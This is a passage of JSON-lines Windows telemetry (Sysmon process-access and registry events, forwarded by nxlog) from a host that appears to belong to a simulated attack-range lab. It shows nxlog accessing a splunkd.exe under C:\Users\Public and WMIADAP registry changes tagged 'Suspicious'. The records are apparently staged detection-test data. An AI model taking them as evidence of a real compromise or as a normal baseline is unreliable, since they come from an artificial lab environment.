(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:10.491","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:11.492\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:11.492","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:12.492\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:12.492","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:13.492\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:13.492","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:14.492\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:14.492","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1001,"SourceName":"Microsoft-Windows-LoadPerf","ProviderGuid":"{122EE297-BB47-41AE-B265-1CA8D1886D40}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12126,"ProcessID":3836,"ThreadID":3816,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Performance counters for the WmiApRpl (WmiApRpl) service were removed successfully. The Record Data contains the new values of the system Last Counter and Last Help registry entries.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:14.914\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating\r\nDetails: WmiApRpl","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.914","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Details":"WmiApRpl","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter\r\nDetails: DWORD (0x00006322)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter","Details":"DWORD (0x00006322)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help\r\nDetails: DWORD (0x00006323)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help","Details":"DWORD (0x00006323)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
